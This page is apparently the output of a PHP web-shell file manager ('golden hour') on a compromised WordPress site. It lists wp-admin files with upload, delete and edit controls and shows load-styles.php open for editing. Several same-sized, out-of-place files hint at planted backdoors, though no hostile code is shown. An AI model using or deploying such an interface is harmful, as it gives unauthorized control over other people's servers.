golden hour
/home/godaofbq/zenearth.com/wp-admin
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
197 B
Del
OK
about.php
16.64 KB
Del
OK
admin-ajax.php
5.03 KB
Del
OK
admin-footer.php
2.76 KB
Del
OK
admin-functions.php
406 B
Del
OK
admin-header.php
8.87 KB
Del
OK
admin-post.php
2.02 KB
Del
OK
admin.php
12.26 KB
Del
OK
async-upload.php
4.71 KB
Del
OK
authorize-application.php
10.09 KB
Del
OK
comment.php
11.35 KB
Del
OK
config.php
6.83 KB
Del
OK
contribute.php
5.59 KB
Del
OK
credits.php
3.75 KB
Del
OK
css
-
Del
OK
custom-background.php
416 B
Del
OK
custom-header.php
426 B
Del
OK
customize.php
10.87 KB
Del
OK
edit-comments.php
14.38 KB
Del
OK
edit-form-advanced.php
28.73 KB
Del
OK
edit-form-blocks.php
12.05 KB
Del
OK
edit-form-comment.php
8.34 KB
Del
OK
edit-link-form.php
6.21 KB
Del
OK
edit-tag-form.php
10.43 KB
Del
OK
edit-tags.php
21.93 KB
Del
OK
edit.php
19.48 KB
Del
OK
erase-personal-data.php
7.33 KB
Del
OK
error_log
2.06 KB
Del
OK
export-personal-data.php
7.75 KB
Del
OK
export.php
11.02 KB
Del
OK
filefuns.php
5.28 KB
Del
OK
freedoms.php
4.5 KB
Del
OK
images
-
Del
OK
import.php
7.48 KB
Del
OK
includes
-
Del
OK
index.php
7.68 KB
Del
OK
install-helper.php
6.8 KB
Del
OK
install.php
17.08 KB
Del
OK
js
-
Del
OK
link-add.php
938 B
Del
OK
link-manager.php
4.26 KB
Del
OK
link-parse-opml.php
2.63 KB
Del
OK
link.php
2.89 KB
Del
OK
load-scripts.php
2.22 KB
Del
OK
load-styles.php
3.12 KB
Del
OK
maint
-
Del
OK
media-new.php
3.18 KB
Del
OK
media-upload.php
3.49 KB
Del
OK
media.php
819 B
Del
OK
menu-header.php
9.83 KB
Del
OK
menu.php
16.67 KB
Del
OK
moderation.php
307 B
Del
OK
module.php
6.83 KB
Del
OK
ms-admin.php
196 B
Del
OK
ms-delete-site.php
4.19 KB
Del
OK
ms-edit.php
216 B
Del
OK
ms-options.php
229 B
Del
OK
ms-sites.php
215 B
Del
OK
ms-themes.php
217 B
Del
OK
ms-upgrade-network.php
219 B
Del
OK
ms-users.php
215 B
Del
OK
my-sites.php
4.74 KB
Del
OK
nav-menus.php
48.01 KB
Del
OK
network
-
Del
OK
network.php
5.39 KB
Del
OK
options-discussion.php
15.58 KB
Del
OK
options-general.php
20.74 KB
Del
OK
options-head.php
548 B
Del
OK
options-media.php
6.35 KB
Del
OK
options-permalink.php
21.21 KB
Del
OK
options-privacy.php
9.95 KB
Del
OK
options-reading.php
10.03 KB
Del
OK
options-writing.php
9.1 KB
Del
OK
options.php
13.54 KB
Del
OK
plugin-editor.php
13.42 KB
Del
OK
plugin-install.php
6.83 KB
Del
OK
plugins.php
29.13 KB
Del
OK
post-new.php
2.7 KB
Del
OK
post.php
9.97 KB
Del
OK
press-this.php
2.34 KB
Del
OK
privacy-policy-guide.php
3.67 KB
Del
OK
privacy.php
2.48 KB
Del
OK
profile.php
283 B
Del
OK
revision.php
5.71 KB
Del
OK
security.php
6.83 KB
Del
OK
setup-config.php
17.46 KB
Del
OK
site-editor.php
6.26 KB
Del
OK
site-health-info.php
3.99 KB
Del
OK
site-health.php
10.2 KB
Del
OK
term.php
2.2 KB
Del
OK
theme-editor.php
15.42 KB
Del
OK
theme-install.php
23.34 KB
Del
OK
themes.php
46.96 KB
Del
OK
tools.php
3.43 KB
Del
OK
update-core.php
45.42 KB
Del
OK
update.php
12.79 KB
Del
OK
upgrade-functions.php
341 B
Del
OK
upgrade.php
5.55 KB
Del
OK
upload.php
14.85 KB
Del
OK
user
-
Del
OK
user-edit.php
39.27 KB
Del
OK
user-new.php
23.98 KB
Del
OK
users.php
23.29 KB
Del
OK
widgets-form-blocks.php
4.39 KB
Del
OK
widgets-form.php
19.17 KB
Del
OK
widgets.php
1.09 KB
Del
OK
wp-blog-header.php
2.74 KB
Del
OK
wp-cron.php
9.57 KB
Del
OK
xmlrpc.php
6.83 KB
Del
OK
Edit: load-styles.php
<?php /* * Disable error reporting. * * Set this to error_reporting( -1 ) for debugging. */ error_reporting( 0 ); // Set ABSPATH for execution. if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( __DIR__ ) . '/' ); } define( 'WPINC', 'wp-includes' ); define( 'WP_CONTENT_DIR', ABSPATH . 'wp-content' ); require ABSPATH . 'wp-admin/includes/noop.php'; require ABSPATH . WPINC . '/theme.php'; require ABSPATH . WPINC . '/class-wp-theme-json-resolver.php'; require ABSPATH . WPINC . '/global-styles-and-settings.php'; require ABSPATH . WPINC . '/script-loader.php'; require ABSPATH . WPINC . '/version.php'; $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) { $protocol = 'HTTP/1.0'; } $load = $_GET['load']; if ( is_array( $load ) ) { ksort( $load ); $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); if ( empty( $load ) ) { header( "$protocol 400 Bad Request" ); exit; } $rtl = ( isset( $_GET['dir'] ) && 'rtl' === $_GET['dir'] ); $expires_offset = 31536000; // 1 year. $out = ''; $wp_styles = new WP_Styles(); wp_default_styles( $wp_styles ); $etag = "WP:{$wp_version};"; foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_styles->registered ) ) { continue; } $ver = $wp_styles->registered[ $handle ]->ver ? $wp_styles->registered[ $handle ]->ver : $wp_version; $etag .= "{$handle}:{$ver};"; } /* * This is not intended to be cryptographically secure, just a fast way to get * a fixed length string based on the script versions. As this file does not * load the full WordPress environment, it is not possible to use the salted * wp_hash() function. */ $etag = 'W/"' . md5( $etag ) . '"'; if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) && stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ) === $etag ) { header( "$protocol 304 Not Modified" ); exit; } foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_styles->registered ) ) { continue; } $style = $wp_styles->registered[ $handle ]; if ( empty( $style->src ) ) { continue; } $path = ABSPATH . $style->src; if ( $rtl && ! empty( $style->extra['rtl'] ) ) { // All default styles have fully independent RTL files. $path = str_replace( '.min.css', '-rtl.min.css', $path ); } $content = get_file( $path ) . "\n"; // Note: str_starts_with() is not used here, as wp-includes/compat.php is not loaded in this file. if ( 0 === strpos( $style->src, '/' . WPINC . '/css/' ) ) { $content = str_replace( '../images/', '../' . WPINC . '/images/', $content ); $content = str_replace( '../js/tinymce/', '../' . WPINC . '/js/tinymce/', $content ); $content = str_replace( '../fonts/', '../' . WPINC . '/fonts/', $content ); $out .= $content; } else { $out .= str_replace( '../images/', 'images/', $content ); } } header( "Etag: $etag" ); header( 'Content-Type: text/css; charset=UTF-8' ); header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + $expires_offset ) . ' GMT' ); header( "Cache-Control: public, max-age=$expires_offset" ); echo $out; exit;
Save